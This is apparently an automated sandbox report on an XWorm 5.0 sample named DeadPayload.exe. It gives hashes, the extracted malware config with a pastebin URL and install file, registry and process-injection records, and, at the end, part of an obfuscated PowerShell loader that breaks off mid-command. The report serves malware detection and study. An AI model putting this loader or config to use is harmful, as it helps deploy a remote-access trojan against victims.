Analysis
-
max time kernel
23s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2024, 18:59
Static task
static1
General
-
Target
DeadPayload.exe
-
Size
500KB
-
MD5
4dbebfa079ea4b45eb94e2843180c56b
-
SHA1
820487493a6845752041ca9e0f714025c9eda4bc
-
SHA256
a17456d92d96f3fa579828f04e0530bf650eb92baf68bc414f101f6656c01cda
-
SHA512
b347ac5f39440fad010c8c8e715fb293967ae08b43cf246ea09b328b00a4f35ea6a251e432ad6c26901fb5db8936c57f370df321ae86cb8180e5aee2de57574b
-
SSDEEP
12288:N3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdN:dkGTy
Malware Config
Extracted
xworm
5.0
QgVg78qW15uIsQ4H
-
Install_directory
%Public%
-
install_file
ohh.exe
-
pastebin_url
https://pastebin.com/raw/J09JweeH
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023cb0-7.dat family_xworm behavioral1/memory/1384-14-0x0000000000B50000-0x0000000000B5E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2516 created 616 2516 powershell.EXE 5 -
Xworm family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation DeadPayload.exe -
Executes dropped EXE 2 IoCs
pid Process 1384 DeadMan.exe 752 DeadRoot.exe -
pid Process 2516 powershell.EXE -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2516 set thread context of 2664 2516 powershell.EXE 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadRoot.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe -
Modifies data under HKEY_USERS 56 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184010F86B2C47" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184010F86B2C47 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b000000000200000000001066000000010000200000007860fef9ba1a018b7ad080b34f6d8d409722dc3e771c172dbad3a0d356bac1ed000000000e8000000002000020000000c972841cc3417197bfe3938b7407121fc608137b5f5be3feee7761ef5df8722e80000000f20261550f9044158c3dad3769c5e73eef768c6fe901201dead3dc6d6cf5af0422ab36957a33cb1e0b234f50a416ade4f1de92769adf28d314f7e13c121cd5fb90b9a61767ab0416500667228223579c6f95afaefbd53f8bfb7963c07cf6b9afb47a57296072bfc75d9167d459a36fa61eb89d6a52c85d092f116b164680be5c4000000016ab95f2eb26ec3d9110af397a1b4d6c2c8ac51f8c0014211c2aaf158e691f9bf022f53cb875dfd66c4d157004d05a0030b01c56ae9b3f00f31f18ad12899b60 mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184010F86B2C47" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b0000000002000000000010660000000100002000000020dc554a67657264ec0dbf9e9df113f68fd6a9cd9f86317549b55e72ec000605000000000e80000000020000200000006014ac23a80bca00e2a53f444678cee70a2f0a00f3b4fd540148b2de76ce1c53b00300007e12ce537485dde62e93eed2ae8e10589047d350096c8dc50d9508003c7f5b2a2c385dfa8dd45185afec85b38167e527e5f0c474ad14d5dccfd0ef01e8d0bae500c1d5fd45914a1a6a1212bc23ed7f3a8b22c3cd3f4caa15a36afb9a939fcee12e43b035cda12b18fea60f6110721491ef3ed96d7ded91e83afc47073b458ad22d4536c4dc3be7d6317250afd5f3d805510860e2518c248d39c8c758daa3cd86ba0125dd673d43052d5be59ac140c1ff12231ddd6d4ec2712830e99d181552294e1d1ba7f3e961611c86c2972c078481b1080f513f07391b955b34b886d38d94c57de7d0ca79982c2f3675ec0e93821bbe70e0ec57984efa57681460d6f883009a76755693c40d7a38a272f5f954ce1190612dedb907798491fca3e10bb19b20037246ea756c573c0b4a378d1d82ae2b77253f77026018278876c2432bb8169b14d50c9f7c1bbc97eefd692927aac38a75a75c515767648aad3c4f01fd28802216e159d52252deb14f2b03cd28983330488001346ffd0c0d545a5d3cb7d7428201915595f10015fa1bf8571fca19891f4e35cff9f0921c682bafb6ede88dcc27116f6d2106d8dca4fb43dd09d87320eea68fa6146acbe04f8293086cff5ad4d4594820a3cea8959f14f44ddf125e017c5395e29dafdaba30fee477c50e8363a8c4f5365076383df92c67901982c1b618ab4136b3c328bf9904fe8d6cb2963babe638e2e208ee63fdabc22c7b8becf507c4555cfb36b5de9294bd4f6d81c5bfb9c09c684e48c37d4f2dcb2cd32e8910d229e183f3636806050d6ef7c199a3b2b3238b11df38790a2ccef5c56e6058fa902c583989497e4f188d08a5a52f260193287e17f827aa54a7d4d4d60e052e2c2760b67fe7d2a486699b385e3e7cd052dff4e2de4b1f936aa535c2c5157ee2e75fbd6e44d69b878334c86aa20f48e9488351502cc4014c19f7e016fec56ee8b5c20f23f44933be76568506b0eb8c8abdb72bb14f8c7b654601ef4164d937979ec72510bbd21c310d2cb5410d43064e6f64a4741b0a16ef1ceb5dcbecab5e61b7d2aa4ac2639bbd7e9776c2cf5cf2a5f66a143649de30462d885f480c044efa45a5e21582f465776318af6fd0805ccc408918fcb71e7534afdcad8f2d13a82d228962ad914a8bd695ae0e36356d0bbc2c87fff8e3ab25fc0841ac60def1a83bec8ea3ba383be705be8b87a68dbfc4ab6ca7e9d3315032099878fa5e7b0bdb635c3a14225ea7670ecedf4160ad7e5b0f509e98451e13bcc939d5acb508948c9f6a8c4fddb7e182627b341767fb40dbcc514952270999ccb1c24ae82c7dc9f5da961640000000f103291ea7a98ab6da91e7058557c360e805b516f9e4a48aa5357d5d0d7517c9cfd6a76de0a9bc6a0dfa2c93ca3246e89d0c295956b8573b5ee7c0238ee21186 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2516 powershell.EXE 2516 powershell.EXE 2788 taskmgr.exe 2516 powershell.EXE 2516 powershell.EXE 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2788 taskmgr.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2788 taskmgr.exe 2788 taskmgr.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2788 taskmgr.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe 2664 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1384 DeadMan.exe Token: SeDebugPrivilege 2788 taskmgr.exe Token: SeSystemProfilePrivilege 2788 taskmgr.exe Token: SeCreateGlobalPrivilege 2788 taskmgr.exe Token: SeDebugPrivilege 2516 powershell.EXE Token: SeDebugPrivilege 2516 powershell.EXE Token: SeDebugPrivilege 2664 dllhost.exe Token: SeShutdownPrivilege 1408 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1408 mousocoreworker.exe Token: SeShutdownPrivilege 384 dwm.exe Token: SeCreatePagefilePrivilege 384 dwm.exe Token: SeShutdownPrivilege 1408 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1408 mousocoreworker.exe Token: SeShutdownPrivilege 3944 RuntimeBroker.exe Token: SeShutdownPrivilege 1408 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1408 mousocoreworker.exe Token: SeShutdownPrivilege 3944 RuntimeBroker.exe Token: SeShutdownPrivilege 1408 mousocoreworker.exe Token: SeCreatePagefilePrivilege 1408 mousocoreworker.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe -
Suspicious use of SendNotifyMessage 35 IoCs
pid Process 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe 2788 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2904 wrote to memory of 1384 2904 DeadPayload.exe 86 PID 2904 wrote to memory of 1384 2904 DeadPayload.exe 86 PID 2904 wrote to memory of 752 2904 DeadPayload.exe 96 PID 2904 wrote to memory of 752 2904 DeadPayload.exe 96 PID 2904 wrote to memory of 752 2904 DeadPayload.exe 96 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2516 wrote to memory of 2664 2516 powershell.EXE 99 PID 2664 wrote to memory of 616 2664 dllhost.exe 5 PID 2664 wrote to memory of 664 2664 dllhost.exe 7 PID 2664 wrote to memory of 960 2664 dllhost.exe 12 PID 2664 wrote to memory of 384 2664 dllhost.exe 13 PID 2664 wrote to memory of 744 2664 dllhost.exe 14 PID 2664 wrote to memory of 1044 2664 dllhost.exe 16 PID 2664 wrote to memory of 1132 2664 dllhost.exe 17 PID 2664 wrote to memory of 1140 2664 dllhost.exe 18 PID 2664 wrote to memory of 1160 2664 dllhost.exe 19 PID 2664 wrote to memory of 1168 2664 dllhost.exe 20 PID 2664 wrote to memory of 1248 2664 dllhost.exe 21 PID 2664 wrote to memory of 1296 2664 dllhost.exe 22 PID 2664 wrote to memory of 1328 2664 dllhost.exe 23 PID 2664 wrote to memory of 1412 2664 dllhost.exe 24 PID 2664 wrote to memory of 1516 2664 dllhost.exe 25 PID 2664 wrote to memory of 1548 2664 dllhost.exe 26 PID 2664 wrote to memory of 1556 2664 dllhost.exe 27 PID 2664 wrote to memory of 1672 2664 dllhost.exe 28 PID 2664 wrote to memory of 1712 2664 dllhost.exe 29 PID 2664 wrote to memory of 1736 2664 dllhost.exe 30 PID 2664 wrote to memory of 1776 2664 dllhost.exe 31 PID 2664 wrote to memory of 1812 2664 dllhost.exe 32 PID 2664 wrote to memory of 1944 2664 dllhost.exe 33 PID 2664 wrote to memory of 2024 2664 dllhost.exe 34 PID 2664 wrote to memory of 2032 2664 dllhost.exe 35 PID 2664 wrote to memory of 1696 2664 dllhost.exe 36 PID 2664 wrote to memory of 1764 2664 dllhost.exe 37 PID 2664 wrote to memory of 2092 2664 dllhost.exe 38 PID 2664 wrote to memory of 2216 2664 dllhost.exe 40 PID 2664 wrote to memory of 2352 2664 dllhost.exe 41 PID 2664 wrote to memory of 2360 2664 dllhost.exe 42 PID 2664 wrote to memory of 2488 2664 dllhost.exe 43 PID 2664 wrote to memory of 2576 2664 dllhost.exe 44 PID 2664 wrote to memory of 2616 2664 dllhost.exe 45 PID 2664 wrote to memory of 2652 2664 dllhost.exe 46 PID 2664 wrote to memory of 2672 2664 dllhost.exe 47 PID 2664 wrote to memory of 2688 2664 dllhost.exe 48 PID 2664 wrote to memory of 2948 2664 dllhost.exe 49 PID 2664 wrote to memory of 3008 2664 dllhost.exe 50 PID 2664 wrote to memory of 64 2664 dllhost.exe 51 PID 2664 wrote to memory of 3156 2664 dllhost.exe 53 PID 2664 wrote to memory of 3228 2664 dllhost.exe 54 PID 2664 wrote to memory of 3372 2664 dllhost.exe 55 PID 2664 wrote to memory of 3452 2664 dllhost.exe 56 PID 2664 wrote to memory of 3564 2664 dllhost.exe 57 PID 664 wrote to memory of 2652 664 lsass.exe 46 PID 2664 wrote to memory of 3772 2664 dllhost.exe 58 PID 2664 wrote to memory of 3944 2664 dllhost.exe 60 PID 2664 wrote to memory of 3696 2664 dllhost.exe 62 PID 2664 wrote to memory of 4492 2664 dllhost.exe 65 PID 2664 wrote to memory of 4240 2664 dllhost.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9c82a91a-4f89-4e1e-a777-fa798af6a168}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1168 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EhbPppVxgsaJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ISiXdPssVLMmbB,[Parameter(Position=1)][Type]$upPhTesbAQ)$BWqqUIqTyOt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+'o'+'du'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s'+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BWqqUIqTyOt.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ISiXdPssVLMmbB).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+'e'+'d');$BWqqUIqTyOt.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+'c'+','+[Char](72)+'i'+[Char](100)+'eB'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'ot'+[Char](44)+''+'V'+'i'+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$upPhTesbAQ,$ISiXdPssVLMmbB).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BWqqUIqTyOt.CreateType();}$tAaprRSgsHKNj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+[Char](115)+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+'a'+'t'+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$LjUYWeHKnsamcX=$tAaprRSgsHKNj.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object 